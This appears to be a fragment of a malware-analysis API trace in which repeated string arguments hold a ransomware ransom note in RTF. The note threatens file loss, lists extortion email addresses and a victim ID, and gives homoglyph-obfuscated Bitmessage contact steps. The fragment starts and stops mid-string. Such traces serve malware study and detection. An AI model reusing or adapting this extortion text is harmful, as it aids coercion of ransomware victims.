460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" 